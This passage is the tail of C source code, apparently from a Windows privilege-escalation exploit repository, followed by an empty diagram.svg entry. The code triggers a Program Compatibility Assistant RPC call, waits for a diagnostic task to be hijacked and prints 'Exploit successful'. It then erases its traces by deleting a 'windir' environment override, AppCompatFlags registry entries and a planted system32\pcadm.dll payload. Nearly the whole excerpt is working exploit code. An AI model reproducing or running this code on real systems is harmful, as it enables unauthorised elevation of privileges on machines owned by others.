RAiNotifyUserCallbackExceptionProcess(pcaBinding, 574 | exeName, 1, processInfo.dwProcessId); 575 | } 576 | __except (EXCEPTION_EXECUTE_HANDLER) { 577 | wprintf(L"RAiNotifyUserCallbackExceptionProcess() exception: %#010x\n", GetExceptionCode()); 578 | goto eofEarly; 579 | } 580 | if (pcaResult) { 581 | wprintf(L"RAiNotifyUserCallbackExceptionProcess() failed. Error: %ld\n", pcaResult); 582 | goto eofEarly; 583 | } 584 | } 585 | 586 | if (WaitForSingleObject(hHijackEvent, 20000) == WAIT_TIMEOUT) 587 | wprintf(L"Diagnostic module task did not launch & exit properly. HRESULT: %#010x\n", hr); 588 | else 589 | taskHijacked = TRUE; 590 | 591 | eofEarly: 592 | RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir"); 593 | if (!usesPca) { 594 | RegDeleteKeyValueW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers", 595 | exeName); 596 | RegDeleteKeyValueW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Persisted", 597 | exeName); 598 | } 599 | else 600 | RegDeleteKeyValueW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store", 601 | exeName); 602 | 603 | if (taskHijacked) { 604 | SetConsoleTextAttribute(hConsole, 15); 605 | wprintf(L">>> "); 606 | SetConsoleTextAttribute(hConsole, 14); 607 | _putws(L"Exploit successful\n"); 608 | SetConsoleTextAttribute(hConsole, 7); 609 | 610 | exitCode = 0; 611 | } 612 | 613 | WaitForSingleObject(hDeleteEvent, 20000); 614 | 615 | eof: 616 | if (pcaBinding) 617 | RpcBindingFree(&pcaBinding); 618 | if (processInfo.hThread) 619 | CloseHandle(processInfo.hThread); 620 | if (processInfo.hProcess) 621 | CloseHandle(processInfo.hProcess); 622 | if (explorer) 623 | CloseHandle(explorer); 624 | if (hDeleteEvent) 625 | CloseHandle(hDeleteEvent); 626 | if (hHijackEvent) 627 | CloseHandle(hHijackEvent); 628 | if (pSharedMem) 629 | UnmapViewOfFile(pSharedMem); 630 | if (hSharedMem) 631 | CloseHandle(hSharedMem); 632 | if (curDir) 633 | HeapFree(GetProcessHeap(), 0, curDir); 634 | if (hService) 635 | CloseServiceHandle(hService); 636 | if (scHandle) 637 | CloseServiceHandle(scHandle); 638 | if (comReady) 639 | CoUninitialize(); 640 | if (createdPayload) 641 | DeleteFileW(L"system32\\pcadm.dll"); 642 | if (createdSystemFake) 643 | RemoveDirectoryW(L"system32"); 644 | if (deleteList) 645 | DeleteProcThreadAttributeList(si.lpAttributeList); 646 | if (si.lpAttributeList) 647 | HeapFree(GetProcessHeap(), 0, si.lpAttributeList); 648 | return exitCode; 649 | } 650 | -------------------------------------------------------------------------------- /diagram.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | --------------------------------------------------------------------------------